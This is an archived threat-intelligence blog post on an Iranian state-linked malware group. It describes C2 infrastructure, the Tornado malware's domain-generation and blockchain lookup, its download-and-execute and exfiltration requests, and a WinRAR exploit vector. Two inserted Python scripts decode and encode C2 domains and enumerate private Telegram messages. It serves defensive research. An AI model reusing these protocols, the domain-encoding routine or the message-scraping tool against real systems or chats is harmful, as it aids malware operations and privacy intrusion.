{
	"id": "f6952c7a-d797-4c13-9a70-4b401d33335a",
	"created_at": "2026-04-06T01:32:19.914762Z",
	"updated_at": "2026-04-10T03:36:22.914401Z",
	"deleted_at": null,
	"sha1_hash": "0320483934aa386688f962f27c809fb89ac15f87",
	"title": "An Update on the Prince of Persia Threat Actor | SafeBreach",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 14626877,
	"plain_text": "An Update on the Prince of Persia Threat Actor | SafeBreach\r\nBy Tomer Bar, VP Security Research, SafeBreach\r\nArchived: 2026-04-06 00:31:53 UTC\r\nOn December 18, 2025, we shared Part I of our most recent research project on the Iranian state-sponsored threat actor known as “Prince of Persia.” SafeBreach Labs has followed this threat actor since 2019 and originally published research in 2021 that presented evidence they had dramatically reinforced their operations security activities, technical proficiency, and tooling capabilities.\r\nHowever, for the next three years, there was no publicly identified activity from the group. Our research team continued to hunt for evidence based on a variety of anchors and patterns we defined. As a result, we were able to maintain unprecedented visibility into their malicious activity during this time. Our findings, which were included in Part I of our research, showed that the scale of Prince of Persia’s activities was more significant than we originally anticipated. Our research documented at least three active variants of Foudre and Tonnerre malware being used by the group, identified new C2 servers supporting their activities, uncovered the details of a Telegram group being used to exfiltrate victim data, and more.\r\nIt didn’t take long before the threat actors behind the Prince of Persia responded to our latest publication, and we began Part II of our research to track their latest activities. Over the three weeks from December 19, 2025, to January 8, 2026, we saw the group replace the Telegram user and all C2 servers we identified in our previous research, make changes to hide victim heatmaps and cover their tracks, and attempt a potential strike-back at our researchers that revealed surprising parallels to a previously documented attack targeting open-source Python libraries. 
\r\nWe also noticed that the threat actor stopped maintaining its C2 servers on January 8 for the first time since we began monitoring their activities. This was the same day a country-wide internet shutdown was imposed by Iranian authorities in response to recent protests, which likely suggests that even government-affiliated cyber units did not have the ability or motivation to carry out malicious activities from within Iran. On January 25, our visibility into the threat actor’s actions uncovered renewed activity as they began preparing new C2 servers, and on January 26 a victim machine resumed exfiltrating data. This led us to predict that the Iranian regime would soon end the internet blackout, which it did one day later, on January 27. We believe this provides solid proof that the Prince of Persia is a state-sponsored threat actor operated by the Iranian regime and that we have the ability to predict its future actions using the visibility we have established into their cyber operations.\r\nIn the blog below, we first provide a high-level overview of the key findings and takeaways from this latest phase of research. Next, we share in-depth details about the threat actor’s activities since the publication of Part I of our research in December 2025. Then, we share our discovery and analysis of Tornado (named Tonnerre v50 in Part I of our research), which is the latest malware family used by the threat actor. We also document a potential attempt by the threat actor to infect our research machines with a two-stage attack using ZZ Stealer, which loads a custom variant of the StormKitty infostealer. Next, we highlight similarities between this malware and other previously documented infostealers, suggesting a potential link to other threat actors. 
Finally, we provide two appendices that outline the ZZ Stealer decryption script and updated indicators of compromise (IoCs).\r\nKey Findings\r\nPart II of our research targeting the Prince of Persia threat actor group took place from December 19, 2025, to February 3, 2026. During this time frame, we were able to maintain a level of visibility into the threat actor’s activity and infrastructure that allowed us to:\r\n- Achieve access to more than 2,000 exfiltrated files during this period, providing in-depth insights that show:\r\n  - All C2 servers for all three versions of Foudre and Tonnerre were replaced. We found all three new, active C2 servers, including new DGA domain names. During the course of our research, one of the C2 servers was abandoned, leaving the remaining two C2 servers to serve all three versions of Foudre and Tonnerre.\r\n  - The threat actor attempted to cover its tracks and hide the identity of victims, or at least make attribution more difficult, by:\r\n    - Deleting all past communication log files.\r\n    - Changing the backend C2 server code to omit storing the victim’s IP in the communication logs.\r\n    - Changing the filename of exfiltrated files to always include the placeholder address 0.0.0.0 instead of the real victim’s IP address.\r\n  - Use of Tornado version 51, which is based on the Foudre family. We discovered and analyzed this variant, which includes dual C2 server protocols (HTTP and Telegram). It uses two different methods to generate C2 domain names: first, a new DGA algorithm and then fixed names using blockchain data de-obfuscation. This is a unique approach that we assume is being used to provide greater flexibility in registering C2 domain names without the need to update the Tornado version.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 1 of 43\n\n  - A shift in the used attack vector. 
The threat actor is using a 1-day WinRAR vulnerability (likely CVE-2025-8088 or CVE-2025-6218) to extract Tornado to the startup folder. We assume they are leveraging this relatively new public vulnerability in an attempt to increase their successful infection rate.\r\n  - The communication logs for all Foudre and Tonnerre versions now include a new 256-byte array, base64-encoded, for each exfiltrated file. By adding RSA verification to any log being sent, the threat actor appears to be adding protections to prevent other researchers, or malicious actors, from masquerading as victims to send files.\r\n  - The updatelist.txt file, which could be viewed by a browser and used a victim machine’s globally unique identifier (GUID) to check for a new Tonnerre binary download from the C2 server, was cleaned and appears to be obsolete. Now the PHP backend code, which cannot be viewed by a browser, checks whether the machine name is a specific machine name and, if so, redirects to a different Tonnerre file. Again, this appears to be a protection added by the threat actor to conceal victim identities and/or make it more difficult for security researchers to obtain newer versions of Tonnerre.\r\n  - The non-bot user in the threat actor’s Telegram group was replaced, and the original user was added to a new Telegram channel with three subscribers. 
The goal of this channel is still unknown, but we assume it is being used for command and control over victims’ machines.\r\n- Achieve access to all past messages within the threat actor’s Telegram group that we identified in Part I of our research, despite the fact that the group is private and the bot was configured without permissions to read messages. As part of this effort, we:\r\n  - Achieved access to all exfiltrated Foudre and Tonnerre files since February 2025, which included 118 files and 14 shared links, including commands sent to Tonnerre by the threat actor.\r\n  - Identified a malicious ZIP file, masquerading as a victim’s exfiltrated file, in the last message. It drops a ZZ Stealer loader that loads a fork of the StormKitty infostealer sharing very similar source code. We believe this could mean that the threat actor was trying to strike back and infect our security researchers’ machines.\r\n  - Found a very strong correlation between the Prince of Persia and a threat actor who infected open-source Python libraries using similar malware in early 2024, which was documented by Checkmarx. Both used:\r\n    1. The exact same counter-strike technique as a reaction to the same Telegram forward-message attempt.\r\n    2. The same tools and attack chain: a very similar ZIP file and a similar LNK file that uses a similar PowerShell script to drop the exact same variant of the ZZ Stealer malware.\r\n    3. The same process where ZZ Stealer downloads the second-stage malware using the same decryption key from a page with the exact same unique name and parameters.\r\n  - Found a weaker potential correlation between the Prince of Persia and the threat actor known as Educated Manticore. 
The attack vector using ZIP and LNK files and a PowerShell loader technique was used by Educated Manticore and attributed to an Iranian state group focused on targeting Israel. This similarity may indicate the sharing of data and malicious tools between the Prince of Persia and Educated Manticore threat actors.\r\n- Uncover that there were no exfiltrated files and no newly registered DGA domain servers from January 8, 2026, to January 24, 2026, indicating the threat actor was likely impacted by the internet shutdown in Iran.\r\n- Identify renewed activity on January 25, 2026, as the threat actor began preparing new C2 servers, suggesting the impending end of the blackout. As we predicted, the blackout ended on January 27, providing what we believe to be strong proof that the Prince of Persia is a state-sponsored threat actor operated by the Iranian regime.\r\n- Recommend that organizations take the following steps to protect themselves against the techniques used by the Prince of Persia:\r\n  - Ensure their security controls are updated to protect against the IoCs provided in Appendix B.\r\n  - Monitor for any unusual Telegram traffic; both Tornado and the StormKitty fork described below talk to api.telegram.org through the bot API, so bot-API requests from processes that are not a Telegram client are worth alerting on.\r\n  - Ensure their operating systems are fully updated, and patch third-party software as well: the infection vector described below relies on a WinRAR 1-day, which an OS update alone does not fix.\r\nThreat Actor Activity Since Part I Research Publication\r\nSince December 18, when Part I of our Prince of Persia research was published, the threat actor has been very active. On December 21, they created a new C2 server 45.80.148.249, which works in parallel to the existing 45.80.148.195. 
The threat actor registered a new C2 domain name: uiavuflyjqodj.conningstone.net.\r\nA second C2 server domain name, uiavuflyjqodj.hbmc.net, was also created on December 21; it initially resolved to 45.80.148.195, but was modified to resolve to 45.80.148.249 on December 25.\r\nUsually, when the threat actor replaced a C2 server, they cloned the original C2 server and then abandoned it. This time, however, the new C2 server works in parallel with the original one, and some of the settings were changed. For example, the blk.lst file was modified on C2 server 45.80.148.249 to allow the attacker’s machine to send files to the victim’s exfiltration folder instead of the protected blkb folder. This means that we have the ability to easily download the attacker machine’s files; this appears to be purposeful, but the motivation is not entirely clear. Here we can see the difference in the blkb file of the .195 and .249 servers:\r\nThe threat actor also changed the backend code to hide the IP of the victim’s machine and replace it with 0.0.0.0. This is an attempt to make it difficult to correlate each victim file to the relevant victim’s machine. They also committed this change to the older Tonnerre version 17 server (45.80.148.35) on December 28.\r\nIn addition, all the victims’ communication files were deleted (from folder f) and the format of the communication file was modified. The new file content does not include the IP of the victim’s machine; instead it seems to include the base64 encoding of 256 bytes. It may be an RSA signature produced with the key pair whose public key is used to encrypt each file; until now, that key was used only to encrypt each file. 
\r\nAlso on December 28, the older C2 server for Tonnerre versions 12-16 (http://92c5d3b3.ddns.net) stopped resolving to 45.80.148.35. Later that day, the threat actor replaced the C2 server 45.80.148.35 with a new C2 server for both Foudre and Tonnerre. The domain names lklptttt.space and onnmuoru.privatedns.org started resolving to a new C2 server, 45.80.149.3.\r\nWe found that the Tonnerre v17 domain name noonrpxv.privatedns.org resolved to the new C2 server 45.80.149.3. The Tonnerre v12 domain name 26edd0a4.ddns.net resolved to the new C2 server 45.80.149.3 as well.\r\nThe updatelist.txt file was also cleaned and appeared to be obsolete:\r\nInstead, the PHP backend code checks whether the machine name is a specific machine name. If so, the request was redirected to a different Tonnerre file: t00017u14.dat. The file did not exist at the time of the check.\r\nIf the machine’s Globally Unique Identifier (GUID) was a specific GUID, it was redirected to a different Tonnerre file: t00017u3.tmp.\r\nThreat Actor C2 Preparation Predicts End of Internet Blackout\r\nThe threat actor became dormant on January 8, 2026, which was the beginning of the internet blackout in Iran. After two and a half weeks of monitoring, we discovered new activity on January 25, 2026. The threat actor registered two new fixed domain names for Tonnerre v.12-16 and Foudre v.34:\r\nf13.ddnsking.com – Tonnerre fixed domain resolving to C2 server 45.80.149.3\r\nt13.ddnsking.com – Foudre fixed domain resolving to C2 server 45.80.149.3\r\nThe threat actor also registered a new DGA domain for Tonnerre: joqoqwtu.privatedns.org (generated by the DGA FTS12026151). They also registered a Foudre DGA domain: klnptruu.space (generated by the DGA LOS1202615). 
With the threat actor preparing the C2 servers, we believed it was an indication that the internet blackout might end the following week.\r\nOn January 25, the threat actor also registered two domain names, szzqwggurg.hbmc.net and szzqwggurg.conningstone.net, which resolve to the C2 server 45.80.148.249.\r\nWhile there had been no new victim exfiltrated files since January 8, on January 26 at 10:00 am (GMT+2), the first Foudre victim’s machine started to exfiltrate data.\r\nThe internet blackout indeed ended a day later, on January 27, 2026, proving our prediction correct. The nation-state threat actor had internet connectivity two days prior to the end of the blackout and used it to prepare the C2 servers, which was an indication that the Iranian regime intended to end the blackout soon.\r\nWe believe this is additional proof that the Prince of Persia is a state-sponsored threat actor operated by the Iranian regime and that we have a unique ability to predict its actions using our visibility into their cyber operations.\r\nTornado v51 Analysis\r\nThe Infection Vector\r\nThe threat actor uses an archive exploit, which drops an AudioService.exe file to the startup folder. The exploit is probably CVE-2025-8088 or the similar vulnerability CVE-2025-6218; both are WinRAR path traversal flaws that let a crafted archive place an extracted file outside the chosen extraction directory, which is exactly what dropping into the startup folder requires. We believe this was likely in response to a change Microsoft made in the macro security settings of Office, which made it less valuable as an attack vector. 
The threat actor likely took this relatively new public vulnerability as an opportunity to improve their infection rate.\r\nIt was uploaded to VirusTotal from India and Germany, which may indicate the victim countries:\r\nThe file 5db4ed7d07ab028ab6ceba8efec5f667d86a419020d2a8c86e90a3125aa31bb9 masquerades as a doc file named tozihat.doc, but it’s actually a self-extracting (SFX) archive.\r\nThe file AuthFWSnapin.dll uses the name “Tornado version 051” for the malware in the exfiltrated collected data. It installs the second-phase malware (similar to Tonnerre) with the password Hcudhl3hcbgQdpnr3.\r\nThe DGA\r\nThere are two methods for Tornado to find its C2 servers. One is named “manual;” the other is named “active” and is based on blockchain data. This is a unique approach that we assume is being used to provide flexibility in registering C2 domain names, either fixed or weekly domain names, using DGA without the need to update Tornado with a new version to switch between the options.\r\nManual DGA Method\r\nThe manual DGA is selected if the internet is not accessible when a check is completed via an HTTP GET request to amazon.com.\r\nThe DGA includes a new algorithm with two phases:\r\n1. The first phase takes the prefix \u003cyy\u003e\u003cm\u003e\u003cweek number\u003eG\u003c0-11\u003e for Tornado\\Foudre and \u003cyy\u003e\u003cm\u003e\u003cweek number\u003eF\u003c0-11\u003e for Tornado\\Tonnerre and encodes it to base32.\r\n2. The second phase takes the base32 DGA as input and transforms it using the custom alphabet “otdhpgaurxyvszmqlwckbfniej”, then appends \u003ctld\u003e, where tld is one of .site, .ix.tc, and .hbmc.net.\r\nIndeed, the DGA domain name during that week was tegfxbnk.site.\r\nThis part generates eight-character domain names. 
If no registered domain is available, a number between 0 and 11 is appended to the DGA prefix, as seen here:\r\nWe were able to develop code that predicts all Tornado-generated domain names, both for the Tornado/Foudre binary we have and for the Tornado/Tonnerre binary we do not. The DGA is not just \u003cYY\u003e\u003cMM\u003e\u003cweek number\u003e. Instead, it is actually \u003cYY\u003e\u003cMM\u003e\u003cweek number\u003e\u003cLETTER\u003e\u003cnumber between 0-22\u003e. Tornado\\Foudre uses G as the letter and Tornado\\Tonnerre uses F as the letter.\r\nActive DGA Method\r\nIf the internet is accessible and the setting “BlockMethodActived0” is set, Tornado will connect to https://blockchain.info/rawaddr/1HLoD9E4SDFFPDiYfNYnkBLQ85Y51J3Zb1 and download and read the blockchain data for that address. It searches for all the “scriptpubkey” values and then tries to deobfuscate the hex string pushed after OP_RETURN OP_PUSHBYTES. If the output contains characters outside the alphabet, it moves to the next “scriptpubkey” value. When it gets to deobfuscate this record:\r\n“vout”:[{“scriptpubkey”:”6a126f6266636570786f6478667579652e687875”,\r\n“scriptpubkey_asm”:”OP_RETURN OP_PUSHBYTES_18 6f6266636570786f6478667579652e687875”,\r\n“scriptpubkey_type”:”op_return”,\r\n“value”:0}]\r\nThe hex string after OP_PUSHBYTES_18 is the ASCII string “obfcepxodxfuye.hxu”, which then deobfuscates to the final domain name: dnsbroadcaster.lat. 
This indeed resolved in the past to a C2 server.\r\nAnother obfuscated domain is svyeahjfu.pbhjby, which was received from the record:\r\n“vout”:[{“scriptpubkey”:”6a107376796561686a66752e7062686a6279”,\r\n“scriptpubkey_asm”:”OP_RETURN OP_PUSHBYTES_16 7376796561686a66752e7062686a6279”,\r\n“scriptpubkey_type”:”op_return”,\r\n“value”:0}]\r\nIt is deobfuscated to the final domain name querylist.online using this deobfuscation algorithm.\r\nIndeed, both obfuscated domains were deobfuscated as expected:\r\nThe domain name querylist.online was previously registered in January 2025. It was not generated with a DGA and didn’t expire after a week like the other domain names. This allows the threat actor to download files from the C2 server to their machines in Iran using a fixed domain name. It first resolved to the C2 server 45.80.149.100.\r\nOn December 31, the threat actor revived this domain name and changed the resolution to C2 45.80.148.195. This indicates that Tornado started sooner than we originally thought: between December 2024 and January 2025. The .195 server was finally abandoned at the beginning of 2026, and querylist.online is no longer responsive.\r\nIf the setting “BlockMethodActived0” is not set, the file mand.tpm (probably short for MANual Domain) is read. This file probably contains the DGA domain name. It is extracted from the “Constant” field. 
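\r\nThe following Python script is an added example, not code from the article or from the malware. It parses OP_RETURN outputs in the vout/scriptpubkey form quoted above and applies the letter substitution recovered from the two pairs the article gives (obfcepxodxfuye.hxu to dnsbroadcaster.lat and svyeahjfu.pbhjby to querylist.online). Everything else is an assumption: the sample transactions are constructed, letters that occur in neither pair are unknown and are rendered as ?, the encode_record function is only the inverse of that partial table, and the live blockchain.info rawaddr endpoint may name its fields differently from the record quoted here, so check a real response before pointing the walker at it.\r\n

```python
# Added example: recover Tornado C2 domains from OP_RETURN outputs.
# Not the malware author's code. The substitution table is rebuilt from the
# two obfuscated/plain pairs quoted in the article, so letters absent from
# both pairs stay unknown and are rendered as ? in the output.

OP_RETURN = 0x6a
ALPHABET = set('abcdefghijklmnopqrstuvwxyz.')

KNOWN_PAIRS = [
    ('obfcepxodxfuye.hxu', 'dnsbroadcaster.lat'),
    ('svyeahjfu.pbhjby', 'querylist.online'),
]


def build_substitution(pairs):
    '''Map each obfuscated letter to its plain letter; raise if the pairs disagree.'''
    table = {}
    for obfuscated, plain in pairs:
        if len(obfuscated) != len(plain):
            raise ValueError('pair lengths differ: ' + obfuscated)
        for o, p in zip(obfuscated, plain):
            if o == '.':
                continue
            if table.get(o, p) != p:
                raise ValueError('inconsistent mapping for letter ' + o)
            table[o] = p
    return table


TABLE = build_substitution(KNOWN_PAIRS)
INVERSE = {p: o for o, p in TABLE.items()}


def op_return_payload(script_hex):
    '''Return the bytes pushed right after OP_RETURN, or None for anything else.
    Only the single direct push (OP_PUSHBYTES_1..75) seen in the records is handled.'''
    try:
        script = bytes.fromhex(script_hex)
    except ValueError:
        return None
    if len(script) == 0 or script[0] != OP_RETURN or len(script) == 1:
        return None
    push_len = script[1]
    if push_len not in range(1, 76):
        return None
    payload = script[2:2 + push_len]
    if len(payload) != push_len:
        return None
    return payload


def deobfuscate(payload, table=TABLE):
    '''ASCII-decode the payload and apply the substitution.
    Returns None when the payload is not lowercase letters and dots, which is
    the skip condition the article describes for non-alphabet outputs.'''
    try:
        text = payload.decode('ascii')
    except UnicodeDecodeError:
        return None
    if not text or not set(text).issubset(ALPHABET):
        return None
    return ''.join(ch if ch == '.' else table.get(ch, '?') for ch in text)


def extract_domains(txs, table=TABLE):
    '''Walk every output of every transaction and collect decodable domains in order.'''
    domains = []
    for tx in txs:
        for vout in tx.get('vout', []):
            payload = op_return_payload(vout.get('scriptpubkey', ''))
            if payload is None:
                continue
            domain = deobfuscate(payload, table)
            if domain is not None:
                domains.append(domain)
    return domains


def encode_record(domain, inverse=INVERSE):
    '''Build the scriptpubkey hex an operator would publish for a domain (assumed
    inverse of the decoding above; only letters in the recovered table can be encoded).'''
    obfuscated = ''.join(ch if ch == '.' else inverse[ch] for ch in domain)
    payload = obfuscated.encode('ascii')
    return bytes([OP_RETURN, len(payload)]).hex() + payload.hex()


# Constructed sample, modelled on the two records quoted in the article plus
# one ordinary P2PKH output and one OP_RETURN with a non-alphabet payload.
SAMPLE_TXS = [
    {'vout': [
        {'scriptpubkey': '76a914' + '00' * 20 + '88ac', 'scriptpubkey_type': 'p2pkh', 'value': 546},
        {'scriptpubkey': '6a126f6266636570786f6478667579652e687875', 'scriptpubkey_type': 'op_return', 'value': 0},
    ]},
    {'vout': [
        {'scriptpubkey': '6a04deadbeef', 'scriptpubkey_type': 'op_return', 'value': 0},
        {'scriptpubkey': '6a107376796561686a66752e7062686a6279', 'scriptpubkey_type': 'op_return', 'value': 0},
    ]},
]

if __name__ == '__main__':
    for domain in extract_domains(SAMPLE_TXS):
        print(domain)
```

\r\nThe ? placeholder is deliberate: eleven cipher letters never appear in the two records the article quotes, so a domain that uses them cannot be fully recovered until more records are collected. For detection purposes the fixed Bitcoin address in the rawaddr URL is the more durable indicator, since it has to stay constant for every Tornado build that uses the active method.\r\n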
In addition, the field “forceKeyCheck” is checked and, if it appears, the signature file is downloaded to verify that the domain is a verified C2 server.\r\nExamples of HTTP requests to the C2 server:\r\nhttp://whppczunsijn.site/?a=k\u0026d=25350\u0026v=051\u0026c=XC64ZB\u0026i=03845cb8%2D7441%2D4a2f%2D8c0f%2Dc90408af5778\u0026t=2025%2D12%2D16%2D%2D14%2D41%2\r\nhttp://hkdhhwsafvnef.site/?a=k\u0026d=25350\u0026v=051\u0026c=XC64ZB\u0026i=03845cb8%2D7441%2D4a2f%2D8c0f%2Dc90408af5778\u0026t=2025%2D12%2D16%2D%2D14%2D40%2\r\nTornado Communication with the C2 Server\r\nOnce the C2 domain is generated using one of the DGA methods above, Tornado starts to communicate with it. Tornado supports four C2 server actions, signaled by the value of the “a” parameter:\r\n1. Download-and-execute request:\r\nhttp://hkdhhwsafvnef.hbmc.net/?a=d1\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, d1 – download and execute Tonnerre\r\nc = victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\nIf the correct machine GUID is provided, the C2 server redirects to the file https://szzqwggurg.hbmc.net/download/tsetup5.dat, which did not exist at the time of our analysis.\r\n2. Signature file download request:\r\nhttp://hkdhhwsafvnef.hbmc.net/?a=d2\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, d2 – download the Tonnerre signature file\r\nc = victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\n3. 
Domain verification request (is this a verified C2 server?):\r\nhttp://hkdhhwsafvnef.hbmc.net/?a=k\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, k – key\r\nc = victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\nThis results in a redirect to download the signature file, for example: http://szzqwggurg.hbmc.net2632.sig\r\n4. System-info exfiltration request:\r\nhttp://hkdhhwsafvnef.hbmc.net/?a=s\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, s – sysinfo\r\nc = victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\nThis results in a redirect.\r\nTelegram-Based Command \u0026 Control\r\nIf the setting TelegramSendMethodActived0 is set, Tornado will use the Telegram bot API for sysinfo exfiltration, using the sendDocument method:\r\nCommands are received using the getUpdates bot API method:\r\nThe URL of the C2 server’s second-phase malware file is extracted from the “text” field. Tornado verifies that the chat ID is the threat actor’s Telegram group and that the machine GUID value sent is the machine GUID of the machine Tornado is running on.\r\nIf so, it will download and execute the second-phase malware from the URL received.\r\nTornado Installer\r\nThe second executable file in the SFX under the temp folder is reg7989.dll. 
This file uses a mutex named TornadoInstaller. The name is indicative, as this file serves as an installer by calling the export function FC.\r\nIt checks that Avast is not installed, creates a scheduled task for persistence, and executes the Tornado main DLL.\r\nTornado: Analysis of Telegram Group Content\r\nNew Telegram Users \u0026 Channels\r\nOn December 19, 2025, just one day after the publication of our first research article, the threat actor removed the Telegram user we had identified, @ehsan8999100, from the Telegram group sarafraz, which was used for command and control of their victims. A new user, @Ehsan66442, had been added in its place.\r\nHowever, this user, like the original user, is just a member that lacks administrator permissions.\r\nAs before, the bot member of the Telegram group still doesn’t have permissions to read the group’s chat messages.\r\nOn December 21, the original user @ehsan8999100 was added to a new Telegram channel named Test that had three subscribers.\r\nThe included link t.me/ehsan8999100 leads to a channel with empty messages.\r\nThe channel indeed includes the creator and three subscribers, as seen below:\r\nThe channel was also configured to disallow channel member listing:\r\nCapturing Telegram Group Messages \u0026 Exfiltrated Files\r\nOn December 23, we were approached by an individual identified as “Monitoring-Circuit.” They described themselves as a security researcher and provided us with a public tool that had the ability to extract previous and future messages from the threat actor’s Telegram group that we shared in our original research. 
They also provided files and messages they had captured using this tool.\r\nOn December 24-25, we analyzed the tool and found that a single, simple Telegram bot API call was all that was required. We then developed our own tool that iterates this bot API call, which resulted in our ability to capture all the group’s historic messages and files, plus three completely new files exfiltrated in real time. Later, we found out that this technique has been documented since 2019; see here and here for examples.\r\nThe Technique\r\nWe were surprised to see this technique work in action, even though it’s a known technique. First, let’s recap the threat actor group’s settings. The group is private, and the bot is not an administrator and does not have access to messages:\r\nWe can see that indeed the group is empty of messages:\r\nThe Telegram bot API provides an interesting method called forwardMessage. The documentation from the official site can be found here.\r\nThree parameters are required:\r\nfrom_chat_id: the threat actor’s chat group ID\r\nchat_id (research_chat_id): our own chat group ID, to which we added the bot\r\nmessage_id: the individual ID of each message within the group; we knew this parameter was an integer and decided to begin with the number 1 and move onwards.\r\nThe default settings of Telegram allow forwarding. In order to disable this technique on legitimate private Telegram groups and channels, owners should enable content protection by selecting “Restrict saving content”, as seen below.\r\nWhat was even more important is that, on default settings, the bot could forward past messages. As noted earlier, we knew the message_id parameter was an integer, so we iterated on the message_id beginning with 1 and moving onwards. 
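\r\nAs an added example, not a tool from the article or from Monitoring-Circuit, the following Python script iterates message_id through forwardMessage in the way described above. The live transport is a thin urllib wrapper around the real bot API; the offline run uses a constructed stand-in for the API whose chat IDs, message contents and error strings (including the wording assumed for a chat with “Restrict saving content” enabled) are assumptions, so check them against live responses before relying on them.\r\n

```python
# Added example of the forwardMessage enumeration described above.
# Not code from the article. FakeTelegramBotApi, its sample messages and
# its error wording are constructed for an offline run.
import json
import urllib.parse
import urllib.request


def telegram_api(token):
    '''Return a callable that posts a bot API method to api.telegram.org.
    Live transport; nothing in this file calls it.'''
    def call(method, params):
        url = 'https://api.telegram.org/bot' + token + '/' + method
        data = urllib.parse.urlencode(params).encode('utf-8')
        with urllib.request.urlopen(url, data=data, timeout=30) as resp:
            return json.loads(resp.read().decode('utf-8'))
    return call


def summarize(message, requested_id):
    '''Reduce a forwarded Message object to what an analyst wants to log.'''
    if 'document' in message:
        return {'message_id': requested_id, 'kind': 'document',
                'name': message['document'].get('file_name', '')}
    return {'message_id': requested_id, 'kind': 'text', 'name': message.get('text', '')}


def enumerate_forwardable(api, from_chat_id, to_chat_id, start_id=1, max_gap=50, limit=10000):
    '''Forward message ids start_id, start_id+1, ... from from_chat_id into to_chat_id.
    Deleted or never-used ids come back as not found; after max_gap of those in a
    row the scan assumes it has passed the newest message and stops.
    Returns (found, status) where status is one of gap, blocked, error, limit.'''
    found = []
    misses = 0
    for message_id in range(start_id, start_id + limit):
        if misses == max_gap:
            return found, 'gap'
        resp = api('forwardMessage', {'from_chat_id': from_chat_id,
                                      'chat_id': to_chat_id,
                                      'message_id': message_id})
        if resp.get('ok'):
            misses = 0
            found.append(summarize(resp['result'], message_id))
            continue
        description = resp.get('description', '')
        if 'not found' in description:
            misses += 1
            continue
        # Content protection on the source chat rejects every forward, so there is
        # no point continuing; any other error is reported as is.
        if 'forward' in description:
            return found, 'blocked'
        return found, 'error'
    return found, 'limit'


class FakeTelegramBotApi:
    '''Offline stand-in for the bot API (constructed). Only forwardMessage is modelled.'''
    def __init__(self, group_messages, protected=False):
        self.group_messages = group_messages
        self.protected = protected
        self.calls = 0

    def __call__(self, method, params):
        self.calls += 1
        if method != 'forwardMessage':
            return {'ok': False, 'error_code': 404, 'description': 'Not Found'}
        if self.protected:
            return {'ok': False, 'error_code': 400,
                    'description': 'Bad Request: message cannot be forwarded'}
        message = self.group_messages.get(params['message_id'])
        if message is None:
            return {'ok': False, 'error_code': 400,
                    'description': 'Bad Request: message to forward not found'}
        return {'ok': True, 'result': dict(message, chat={'id': params['chat_id']})}


# Constructed group history: ids 4-6 were deleted, and the file names follow
# the tg/ftg timestamp pattern the article describes.
SAMPLE_GROUP = {
    1: {'message_id': 1, 'text': 'test'},
    2: {'message_id': 2, 'document': {'file_name': 'tg2502201015.tmp'}},
    3: {'message_id': 3, 'text': 'https://example.invalid/d1.exe'},
    7: {'message_id': 7, 'document': {'file_name': 'ftg2508011200.tmp'}},
}


def run_sample(protected=False, max_gap=5, limit=100):
    '''Scan the constructed group and return (names, status, number of API calls).'''
    api = FakeTelegramBotApi(SAMPLE_GROUP, protected=protected)
    found, status = enumerate_forwardable(api, -1001, -1002, max_gap=max_gap, limit=limit)
    return [m['name'] for m in found], status, api.calls


if __name__ == '__main__':
    print(run_sample())
```

\r\nThe gap heuristic matters in practice: message ids in a group are dense but not contiguous once messages are deleted, so a scan that stops at the first not-found reply would have missed the later exfiltrated files. The blocked status is what an owner who has enabled content protection should expect the scan to hit on the very first request.\r\n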
We were able to get 118 files and 14 shared links.\r\nThe first messages from the threat actor were from February 16, 2025, which is exactly four days after the first known Foudre v50 C2 domain name (ejjnhkucbw.ix.tc) was registered and then resolved to IP 45.80.149.100. This C2 domain also had a TLS certificate valid from February 5, 2025. The first few messages seem like a test, so we believe this is the first message sent.\r\nThe first Foudre victim’s exfiltrated file was sent on February 20, 2025, and the victim then exfiltrated daily for a week, between March 17 and March 24, 2025. The Foudre file names use the format tg\u003cyymmddhhmm\u003e.tmp.\r\nAfter that, there were no exfiltrated files for four months. Tonnerre files were exfiltrated from August 1, 2025, to September 5, 2025; August 1 is exactly a day after the first known Tonnerre v50 C2 domain name (xjhdvkoszwdpt.privatedns.org) was registered and resolved to IP 45.80.148.124. This C2 domain also had a TLS certificate valid from July 31, 2025.\r\nThis means that there were probably no other C2 servers that were active and missed in our original research report between April and August 2025. Periods of inactivity are not common for this threat actor, but this particular time of dormancy may be explained by the escalation in tensions between Iran and Israel that began in the middle of April 2025 and ended in the 12-day war in June 2025.\r\nThe Tonnerre file names use the format ftg\u003cyymmddhhmm\u003e.tmp. The ftg portion probably stands for Files TeleGram.\r\nThe files were exfiltrated from two different victims. 
At least one of them was an attacker’s test machine.\r\nOn March 24, 2025, an encoded command was sent to a victim, which probably means they downloaded d1.exe from the C2 domain name tegfxbnk.site (this domain resolved to 45.80.149.100, and its TLS certificate was valid between February 16 and May 17, 2025).\r\nThe domain and C2 server are no longer available, so we have not obtained the d1.exe file. Another command was sent just before the above command to download this FlashFXP setup file.\r\nThis file is still available to download:\r\nSha256: 631AE7074649A665D62AC6FC940D203EFF715C88B4B57EE46865286607909231\r\nIt is a Windows FTP client developed and signed by OpenSight Software LLC, which seems like a benign installer. It might have been used as a test before downloading the probable malware file d1.exe.\r\nZZ Stealer Malware: A Strike-Back Attempt\r\nThe messages stopped on September 6, 2025, for a month. Then, on October 13, 2025, one last message was forwarded:\r\nAt first glance, this message seemed like an exfiltrated victim file, but it was actually a malicious file that was potentially sent to infect our analysis machine. The malware installs itself by running a PowerShell script that decodes the executable using XOR with 0x44 and executes it.\r\nThe executable is ZZ Stealer malware version 3.81. The malware is a .NET binary, and all strings are encrypted. A screenshot of a decryption tool, which can decrypt single or multiple encrypted strings embedded in the malware, is included below. The code is attached in the Appendix.\r\nFrom this point, we cannot guarantee that the Prince of Persia threat actor is using ZZ Stealer and the 8==3 StormKitty malware as part of its arsenal, but since it tried to strike back at us, we are sharing the detailed analysis of the full attack chain.\r\nThis malware was already analyzed here. 
